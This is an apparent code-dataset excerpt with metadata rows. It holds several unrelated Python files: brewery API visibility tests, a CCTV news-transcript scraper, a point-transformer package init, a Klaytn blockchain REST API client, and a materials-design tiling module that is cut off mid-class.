self.hidden_brewery = brewery_factory(
brewer=self.hidden_user, name='hidden brewery'
)
def test_prefetch_anon(self):
rv = self.client.get(url_for(self.endpoint))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.public_brewery.name
def test_prefetch_authenticated(self):
self.login(self.hidden_user.email)
rv = self.client.get(url_for(self.endpoint))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.hidden_brewery.name
def test_search_anon(self):
rv = self.client.get(url_for(self.endpoint, q=self.public_brewery.name))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.public_brewery.name
rv = self.client.get(url_for(self.endpoint, q=self.hidden_brewery.name))
data = rv.get_json()
assert len(data) == 0
def test_search_authenticated(self, brewery_factory):
self.login(self.hidden_user.email)
rv = self.client.get(url_for(self.endpoint, q=self.hidden_brewery.name))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.hidden_brewery.name
rv = self.client.get(url_for(self.endpoint, q=self.public_brewery.name))
data = rv.get_json()
assert len(data) == 0
| 41.887906 | 88 | 0.648662 | 1,868 | 14,200 | 4.756424 | 0.052463 | 0.06933 | 0.037817 | 0.047046 | 0.906021 | 0.888689 | 0.870793 | 0.84637 | 0.841531 | 0.816432 | 0 | 0.007155 | 0.222465 | 14,200 | 338 | 89 | 42.011834 | 0.797573 | 0 | 0 | 0.769759 | 0 | 0 | 0.105634 | 0.02162 | 0 | 0 | 0 | 0 | 0.158076 | 1 | 0.116838 | false | 0 | 0.013746 | 0.017182 | 0.168385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d174df6bec18fe65b80084bc74c223b7410be6ed | 6,040 | py | Python | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | 1 | 2021-08-21T14:50:39.000Z | 2021-08-21T14:50:39.000Z | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | null | null | null | akshare/news/news_cctv.py | X-Mars/akshare | 5483fd649b7a7cfc0520b0cbaaf2d76b076855d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/7/20 21:44
Desc: 新闻联播文字稿
https://tv.cctv.com/lm/xwlb/?spm=C52056131267.P4y8I53JvSWE.0.0
"""
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def news_cctv(date: str = "20130308") -> pd.DataFrame:
"""
新闻联播文字稿
https://tv.cctv.com/lm/xwlb/?spm=C52056131267.P4y8I53JvSWE.0.0
:param date: 需要获取数据的日期; 目前 20160203 年后
:type date: str
:return: 新闻联播文字稿
:rtype: pandas.DataFrame
"""
if int(date) <= int("20130708"):
url = f'http://cctv.cntv.cn/lm/xinwenlianbo/{date}.shtml'
r = requests.get(url)
r.encoding = "gbk"
import re
raw_list = re.findall(r"title_array_01\((.*)", r.text)
page_url = [re.findall("(http.*)", item)[0].split("'")[0] for item in raw_list[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
except:
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
elif int(date) < int("20160203"):
url = f'http://cctv.cntv.cn/lm/xinwenlianbo/{date}.shtml'
r = requests.get(url)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
page_url = [item.find("a")['href'] for item in soup.find("div", attrs={"id": "contentELMT1368521805488378"}).find_all('li')[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
except:
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
elif int(date) > int("20160203"):
url = f'https://tv.cctv.com/lm/xwlb/day/{date}.shtml'
r = requests.get(url)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
page_url = [item.find("a")['href'] for item in soup.find_all("li")[1:]]
title_list = []
content_list = []
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'no-cache',
'Cookie': 'cna=DLYSGBDthG4CAbRVCNxSxGT6',
'Host': 'tv.cctv.com',
'Pragma': 'no-cache',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'
}
for page in tqdm(page_url, leave=False):
try:
r = requests.get(page, headers=headers)
r.encoding = 'utf-8'
soup = BeautifulSoup(r.text, "lxml")
title = soup.find('h3').text
content = soup.find('div', attrs={"class": 'cnt_bd'}).text
title_list.append(title.strip("[视频]").strip().replace("\n", " "))
content_list.append(content.strip().strip("央视网消息(新闻联播):").strip("央视网消息(新闻联播):").strip("(新闻联播):").strip().replace("\n", " "))
except:
continue
temp_df = pd.DataFrame([[date]*len(title_list), title_list, content_list], index=["date", "title", "content"]).T
return temp_df
if __name__ == "__main__":
news_cctv_df = news_cctv(date="20150208")
print(news_cctv_df)
| 46.821705 | 160 | 0.555629 | 770 | 6,040 | 4.285714 | 0.219481 | 0.009091 | 0.008182 | 0.036364 | 0.867879 | 0.867879 | 0.861818 | 0.861818 | 0.861818 | 0.861818 | 0 | 0.056932 | 0.258444 | 6,040 | 128 | 161 | 47.1875 | 0.679839 | 0.050993 | 0 | 0.805556 | 0 | 0.055556 | 0.340014 | 0.116034 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009259 | false | 0 | 0.046296 | 0 | 0.083333 | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f148851fa14cdaba5a8939595e71b48ab7f90f3 | 86 | py | Python | point_transformer_pytorch/__init__.py | lucidrains/point-transformer-pytorch | 16acc40c36640d198b6ae79376103302d0134d35 | [
"MIT"
] | 429 | 2020-12-17T04:21:07.000Z | 2022-03-30T06:41:35.000Z | point_transformer_pytorch/__init__.py | dingdingcai/point-transformer-pytorch | c6c334a2d8c52d82f8a31409c4d599883b064535 | [
"MIT"
] | 13 | 2021-01-11T02:10:43.000Z | 2022-02-28T04:59:32.000Z | point_transformer_pytorch/__init__.py | dingdingcai/point-transformer-pytorch | c6c334a2d8c52d82f8a31409c4d599883b064535 | [
"MIT"
] | 45 | 2020-12-20T08:08:59.000Z | 2022-03-21T11:12:30.000Z | from point_transformer_pytorch.point_transformer_pytorch import PointTransformerLayer
| 43 | 85 | 0.94186 | 9 | 86 | 8.555556 | 0.666667 | 0.415584 | 0.597403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 86 | 1 | 86 | 86 | 0.939024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f6e6131edccd04610b6fc8ef914ce77afce5c7b | 14,390 | py | Python | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | 2 | 2021-02-08T18:26:58.000Z | 2021-06-09T09:33:26.000Z | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | null | null | null | BlockSDK/klaytn.py | Block-Chen/blocksdk-python | dbd75caed90d6b1bb0643cd9aad0c5477ccbd689 | [
"Apache-2.0"
] | 1 | 2021-04-23T08:29:33.000Z | 2021-04-23T08:29:33.000Z | from BlockSDK.base import Base
class Klaytn(Base):
def getBlockChain(self, request = {}):
return self.request("GET","/klay/info")
def getBlock(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = False
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/blocks/" + str(request['block']),{"rawtx" : request['rawtx'],"offset": request['offset'],"limit" : request['limit']})
def getMemPool(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = False
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/mempool",{"rawtx" : request['rawtx'],"offset" : request['offset'],"limit" : request['limit']})
def getAddresses(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/addresses",{
"offset" : request['offset'],
"limit" : request['limit']
})
def loadAddress(self, request = {}):
return self.request("POST","/klay/addresses/" + request['address'] + "/load",{"private_key" : request['private_key'],"password" : request['password']})
def unloadAddress(self, request = {}):
return self.request("POST","/klay/addresses/" + request['address'] + "/unload")
def createAddress(self, request = {}):
if not('name' in request) or not request['name']:
request['name'] = None
return self.request("POST","/klay/addresses",{"name" : request['name']})
def getAddressInfo(self, request = {}):
if not('reverse' in request) or not request['reverse']:
request['reverse'] = True
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = None
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/addresses/" + request['address'],{"reverse" : request['reverse'],"rawtx" : request['rawtx'],"offset" : request['offset'],"limit" : request['limit']})
def getAddressBalance(self, request = {}):
return self.request("GET","/klay/addresses/" + request['address'] + "/balance")
def sendToAddress(self, request = {}):
if not('nonce' in request) or not request['nonce']:
request['nonce'] = None
if not('data' in request) or not request['data']:
request['data'] = None
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/addresses/" + request['from'] + "/sendtoaddress",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def sendTransaction(self, request = {}):
return self.request("POST","/klay/transactions/send",{
"hex" : request['hex']
})
def getTransaction(self, request = {}):
return self.request("GET","/klay/transactions/" + request['hash'])
def getKIP7(self, request = {}):
return self.request("GET","/klay/kip7-tokens/" + request['contract_address'])
def getKIP7Balance(self, request = {}):
return self.request("GET","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/balance")
def getKIP7Transfer(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/transfer",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def getKIP7Sign(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['from'] + "/sign",{
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gas_limit" : request['gas_limit']
})
def getKIP7Feedelegated(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
return self.request("POST","/klay/kip7-tokens/" + request['contract_address'] + "/" + request['fee_payer'] + "/transfer/feedelegated",{
"from" : request['from'],
"to" : request['to'],
"amount" : request['amount'],
"private_key" : request['private_key'],
"password" : request['password'],
"gwei" : request['gwei'],
"gas_limit" : request['gas_limit'],
"nonce" : request['nonce'],
"v" : request['v'],
"r" : request['r'],
"s" : request['s']
})
def getNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/tokens",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getOwnerNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['owner_address'] + "/owner",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getCreatorNfts(self, request = {}):
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['creator_address'] + "/creator",{
"offset" : request['offset'],
"limit" : request['limit']
})
def getAuctionNfts(self, request = {}):
if not('order_by' in request) or not request['order_by']:
request['order_by'] = 'end_time'
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/auction",{
"order_by" : request['order_by'],
"order_direction" : request['order_direction'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getSaleNfts(self, request = {}):
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['seller_address'] + "/sale",{
"order_direction" : request['order_direction'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getNftBids(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = 0
if not('order_direction' in request) or not request['order_direction']:
request['order_direction'] = 'desc'
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/bid",{
"order_direction" : request['order_direction'],
"rawtx" : request['rawtx'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getNftInfo(self, request = {}):
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/info")
def getNftTransfers(self, request = {}):
if not('rawtx' in request) or not request['rawtx']:
request['rawtx'] = 0
if not('offset' in request) or not request['offset']:
request['offset'] = 0
if not('limit' in request) or not request['limit']:
request['limit'] = 10
return self.request("GET","/klay/kip17-tokens/" + request['contract_address'] + "/" + request['token_id'] + "/transfers",{
"rawtx" : request['rawtx'],
"offset" : request['offset'],
"limit" : request['limit']
})
def getContractRead(self, request = {}):
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/read",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data']
})
def getContractWrite(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
def getContractWriteSign(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/sign",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
def getContractWriteFeedelegated(self, request = {}):
if not('private_key' in request) or not request['private_key']:
request['private_key'] = None
if not('password' in request) or not request['password']:
request['password'] = None
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/feedelegated",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"fee_payer" : request['fee_payer'],
"private_key" : request['private_key'],
"password" : request['password'],
"amount" : request['amount'],
"gwei" : request['gwei'],
"gas_limit" : request['gas_limit']
})
def getContractWriteFees(self, request = {}):
if not('gas_limit' in request) or not request['gas_limit']:
request['gas_limit'] = None
if not('parameter_type' in request) or not request['parameter_type']:
request['parameter_type'] = None
if not('parameter_data' in request) or not request['parameter_data']:
request['parameter_data'] = None
return self.request("POST","/klay/contracts/" + request['contract_address'] + "/write/fees",{
"method" : request['method'],
"return_type" : request['return_type'],
"parameter_type" : request['parameter_type'],
"parameter_data" : request['parameter_data'],
"from" : request['from'],
"amount" : request['amount'],
"gas_limit" : request['gas_limit']
})
| 39.209809 | 186 | 0.630577 | 1,713 | 14,390 | 5.189142 | 0.06655 | 0.037687 | 0.082911 | 0.105524 | 0.880077 | 0.861289 | 0.855214 | 0.81719 | 0.79019 | 0.79019 | 0 | 0.005196 | 0.184156 | 14,390 | 366 | 187 | 39.31694 | 0.751959 | 0 | 0 | 0.729373 | 0 | 0 | 0.309937 | 0.003127 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.072607 | 0.0033 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
0f8754c29f9a09b790b131667f0a9ce6eb1d02d4 | 18,315 | py | Python | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 112 | 2019-02-11T23:16:36.000Z | 2022-03-23T20:59:57.000Z | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 621 | 2019-03-01T14:44:12.000Z | 2022-03-31T19:49:25.000Z | idaes/apps/matopt/materials/tiling.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 154 | 2019-02-01T23:46:33.000Z | 2022-03-23T15:07:10.000Z | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
from abc import abstractmethod, ABC
import numpy as np
from .geometry import Parallelepiped, Cylinder, CylindricalSector
from .design import Design
class Tiling(object):
""" """
def __init__(self):
pass
# === PROPERTY EVALUATION METHODS
@abstractmethod
def transformInsideTile(self, P):
"""Transform point to lie inside a tile.
Args:
P (numpy.ndarray): Point to modify to be inside tile.
Returns:
None.
"""
raise NotImplementedError
@abstractmethod
def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
"""Create a larger Design by tiling a smaller one.
Args:
D (Design): A smaller Design to tile.
nTiles (int/numpy.ndarray): A specifier for number of
tiles to replicate in periodic directions.
OldToNewIndices (dict<int,list<int>>): Optional, a
dictionary to store the mapping of tiled points
indices from the smaller Design to the larger.
(Default value = None)
AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
Optional, a mapping of locations to properties.
NOTE: It is modified in place, so make a copy before.
(Default value = None)
Returns:
(Design): A larger, periodic Design
"""
raise NotImplementedError
class LinearTiling(Tiling, ABC):
""" Class to manage linear periodicity. """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, TilingDirections_, argShape=None):
super().__init__()
self._TileShape = argShape
self._TilingDirections = TilingDirections_
# === CONSTRUCTOR - From Parallelepiped
@classmethod
def fromParallelepiped(cls, argShape):
assert (type(argShape) == Parallelepiped), 'The input shape is not an instance of Parallelepiped.'
TilingDirections_ = [argShape.Vz, -argShape.Vz]
return cls(TilingDirections_, argShape)
# === CONSTRUCTOR - From Cylinder or CylindricalSector
@classmethod
def fromCylindricalShape(cls, argShape):
assert (type(argShape) == Cylinder or CylindricalSector), 'The input shape is not an instance of Cylinder or CylindricalSector.'
TilingDirections_ = [argShape.Vh, -argShape.Vh]
return cls(TilingDirections_, argShape)
# === CONSTRUCTOR - From POSCAR files
@classmethod
def fromPOSCAR(cls, filename):
return cls.fromParallelepiped(Parallelepiped.fromPOSCAR(filename))
# === BASIC QUERY METHODS
@property
def TileShape(self):
return self._TileShape
@property
def TilingDirections(self):
return self._TilingDirections
@property
def V(self):
return self._TilingDirections[0]
class PlanarTiling(Tiling):
""" """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, Parallelepiped_):
super().__init__()
self._TileShape = Parallelepiped_
self._TilingDirections = []
self._TilingDirections.append(-Parallelepiped_.Vx)
self._TilingDirections.append(-Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx)
self._TilingDirections.append(Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy)
# === CONSTRUCTOR - From POSCAR file
@classmethod
def fromPOSCAR(cls, filename):
"""
Args:
filename:
Returns:
"""
return cls(Parallelepiped.fromPOSCAR(filename))
# === PROPERTY EVALUATION METHODS
def transformInsideTile(self, P, EdgeTol=DBL_TOL):
"""
Args:
P: param EdgeTol: (Default value = DBL_TOL)
EdgeTol: (Default value = DBL_TOL)
Returns:
"""
def _isInsideAndNotOnPosEdge(P, EdgeTol=EdgeTol):
return (self.TileShape.isInShape(P) and
self.TileShape.satisfiesFacet(P, 2, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 3, -EdgeTol))
if _isInsideAndNotOnPosEdge(P, EdgeTol):
return True # Do not transform P, return True
NegCorner = self.TileShape.V[0]
PosCorner = self.TileShape.V[7]
Nx = self.TileShape.FacetNorms[3]
Ny = self.TileShape.FacetNorms[2]
while np.inner(P - NegCorner, -Nx) > PlanarTiling.DBL_TOL:
P += self.TileShape.Vx
while np.inner(P - PosCorner, Nx) > -PlanarTiling.DBL_TOL:
P -= self.TileShape.Vx
while np.inner(P - NegCorner, -Ny) > PlanarTiling.DBL_TOL:
P += self.TileShape.Vy
while np.inner(P - PosCorner, Ny) > -PlanarTiling.DBL_TOL:
P -= self.TileShape.Vy
assert (_isInsideAndNotOnPosEdge(P))
return True
def getFractionalCoords(self, P, blnRelativeToCenter=False, blnRoundInside=True, blnPreferZero=True):
"""
Args:
P: param blnRelativeToCenter: (Default value = False)
blnRoundInside: Default value = True)
blnPreferZero: Default value = True)
blnRelativeToCenter: (Default value = False)
Returns:
"""
# NOTE: The option blnRoundInside is just a way to round numbers close
# to the bounds (0,1) so that they never result in values outside
# of that range. Some programs (like AtomEye?) are not robust
# enough to handle small negative numbers or values greater than 1
# in these cases.
Pfrac = self.TileShape.getFractionalCoords(P, blnRelativeToCenter=blnRelativeToCenter)
Pfrac -= Pfrac.astype(int)
if blnRoundInside:
if blnPreferZero:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
else:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=PlanarTiling.DBL_TOL)] = 1.0
return Pfrac
def getDistance(self, P0, P1):
"""
Args:
P0: param P1:
P1:
Returns:
"""
result = np.linalg.norm(P1 - P0)
for TilingDirection in self.TilingDirections:
P1Tiled = P1 + TilingDirection
TiledDistance = np.linalg.norm(P1Tiled - P0)
if TiledDistance < result:
result = TiledDistance
return result
def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
"""Create a larger Design by tiling a smaller one.
Args:
D (Design): A smaller Design to tile.
nTiles (int/numpy.ndarray): A specifier for number of
tiles to replicate in periodic directions.
OldToNewIndices (dict<int,list<int>>): Optional, a
dictionary to store the mapping of tiled points
indices from the smaller Design to the larger.
(Default value = None)
AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
Optional, a mapping of locations to properties.
NOTE: It is modified in place, so make a copy before.
(Default value = None)
Returns:
(Design): A larger, periodic Design
"""
if isinstance(nTiles, int):
nTiles = np.array([nTiles] * 2, dtype=int)
if OldToNewIndices is None and AuxPropMap is not None:
OldToNewIndices = {}
if OldToNewIndices is not None:
OldToNewIndices.clear()
for i in range(len(D)):
OldToNewIndices[i] = []
result = Design()
for nx in range(nTiles[0]):
for ny in range(nTiles[1]):
Offset = nx * self.Vx + ny * self.Vy
for i, P in enumerate(D.Canvas.Points):
j = len(result)
result.add(P + Offset, D.Contents[i])
if OldToNewIndices is not None:
OldToNewIndices[i].append(j)
if AuxPropMap is not None:
for AuxProp in AuxPropMap:
for i in OldToNewIndices:
for j in OldToNewIndices[i]:
AuxPropMap[AuxProp][j] = AuxPropMap[AuxProp][i]
return result
# === BASIC QUERY METHODS
@property
def TileShape(self):
""" """
return self._TileShape
@property
def TilingDirections(self):
""" """
return self._TilingDirections
@property
def Vx(self):
""" """
return self._TilingDirections[2]
@property
